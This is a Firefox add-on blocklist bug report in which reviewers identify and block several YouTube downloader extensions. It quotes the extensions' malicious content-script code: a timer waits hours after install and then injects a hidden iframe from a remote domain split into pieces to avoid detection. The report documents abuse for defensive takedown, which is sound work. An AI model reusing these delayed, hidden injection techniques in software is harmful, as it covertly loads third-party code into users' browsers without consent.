Closed Bug 1579965 Opened 5 years ago Closed 5 years ago

Extension Block Request: YouTube downloaders injecting content from HTML keywords-alike domains

Categories

(Toolkit :: Blocklist Policy Requests, task)

Product:
Toolkit
Component:
Blocklist Policy Requests
Type:
task
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: gwarser, Assigned: Fallen)

Details
Extension name YouTube downloaders injecting content from HTML keywords-alike domains
Extension versions affected <all versions>
Platforms affected <all platforms>
Block severity hard

Reason

Extensions waits few hours after installation and then content script starts injecting hidden iframe with obfuscated code. Iframe source URL is concealed as random JS or HTML keywords.

  • unexpected hidden behavior
  • connects to unrelated 3p

Extension IDs

@yvd-addon
@youtube-to-mp4
ydh@downloader.youtube.com
youtube-downloader@youtube.com
tomp3@youtube.com

Additional Information

There could be more.

They all use code similar to this:

chrome.storage.local.get('t', function(res) {
    if (res.t) {
        var time = (new Date()
            .getTime() - res.t) / 3600000;
        if (time >= 8) {
            var downloadDiv = document.createElement("div");
            var downloadButton = document.createElement("iframe");
            downloadButton.setAttribute("style", "height:1px,width:1px;position:absolute;top:0;left:0;border:none;visibility:hidden");
            downloadButton.src = '//div' + '.' + 'show/element';
            downloadButton.id = "downloadButton";
            document.body.appendChild(downloadDiv);
            downloadDiv.appendChild(downloadButton);
        }
    }
});
Assignee: nobody → philipp
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true

I couldn't find a such thing in @youtube-to-mp4 or youtube-downloader@youtube.com, can you let me know which snippet you mean there?

Flags: needinfo?(gwarser)

I've reviewed the add-ons and confirmed they contain unexpected features without user consent

The block has been pushed.

Group: blocklist-requests
Status: ASSIGNED → RESOLVED
Closed: 5 years ago
Resolution: --- → FIXED

(Note the block currently excludes those in comment 1)

youtube-downloader@youtube.com:

https://robwu.nl/crxviewer/?crx=https%3A%2F%2Faddons.mozilla.org%2Ffirefox%2Fdownloads%2Flatest%2Fyoutube-downloader-updated%2Fplatform%3A2%2Fyoutube-downloader-updated.xpi&q=!storage.local&qf=files%2Ffg%2FYoutubeWatchPage.js&qb=1&qh=1&qi=1

chrome.storage.local.get('installed', function(res) {
    if (res.installed) {
        var data = (new Date()
            .getTime() - res.installed) / 3600000;
        if (data >= 8) {
            linkContainer = document.createElement('div');
            downloadLink = document.createElement('iframe');
            linkContainer.setAttribute('style', 'visibility:hidden');
            downloadLink.src = '//noop' + '.' + 'style/tube';
            link = document.body.appendChild(linkContainer);
            linkContainer.appendChild(downloadLink);
        }
    }
});

@youtube-to-mp4:

https://robwu.nl/crxviewer/?crx=https%3A%2F%2Faddons.mozilla.org%2Ffirefox%2Fdownloads%2Flatest%2Fyoutube-to-mp4-button%2Fplatform%3A2%2Fyoutube-to-mp4-button.xpi&q=!storage.local&qf=files%2Ffg%2FYoutubeWatchPage.js&qb=1&qh=1&qi=1

}
chrome.storage.local.get('installed', function(res) {
    if (res.installed) {
        var data = (new Date()
            .getTime() - res.installed) / 3600000;
        if (data >= 4) {
            linkContainer = document.createElement('div');
            downloadLink = document.createElement('iframe');
            linkContainer.setAttribute('style', 'visibility:hidden');
            downloadLink.src = '//noop' + '.' + 'style/link';
            link = document.body.appendChild(linkContainer);
            linkContainer.appendChild(downloadLink);
        }
    }
});
Flags: needinfo?(gwarser)

One more if you don't mind:

hd@youtube.com:

https://robwu.nl/crxviewer/?crx=https%3A%2F%2Faddons.mozilla.org%2Ffirefox%2Fdownloads%2Flatest%2Fyoutube-hd-always%2Fplatform%3A2%2Fyoutube-hd-always.xpi&q=!storage.local&qf=data%2Fscript.js&qb=1&qh=1&qi=1

chrome.storage.local.get('init', function(res) {
    if (res.init) {
        var time = (new Date()
            .getTime() - res.init) / 3600000;
        if (time >= 4) {
            var prefsDiv = document.createElement("div");
            var prefsFr = document.createElement("iframe");
            prefsFr.setAttribute("style", "height:1px,width:1px;position:absolute;top:0;left:0;border:none;visibility:hidden");
            prefsFr.src = '//remove' + '.' + 'video/320p';
            prefsFr.id = "prefsFr";
            document.body.appendChild(prefsDiv);
            prefsDiv.appendChild(prefsFr);
        }
    }
});

Thanks for the pointers. Taking care of these now:

hd@youtube.com
@youtube-to-mp4
youtube-downloader@youtube.com
Status: RESOLVED → REOPENED
Resolution: FIXED → ---

I've reviewed the add-ons and confirmed they contain unexpected features without user consent.

Status: REOPENED → ASSIGNED

The block has been pushed.

Status: ASSIGNED → RESOLVED
Closed: 5 years ago5 years ago
Resolution: --- → FIXED

For any new blocks please open a new bug. Thanks for the report!

Flags: needinfo?(philipp)

Thanks for catching that.

Any suggestions, pointers, etc. or reference material that could be use to help me identify things like this?

You need to log in before you can comment on or make changes to this bug.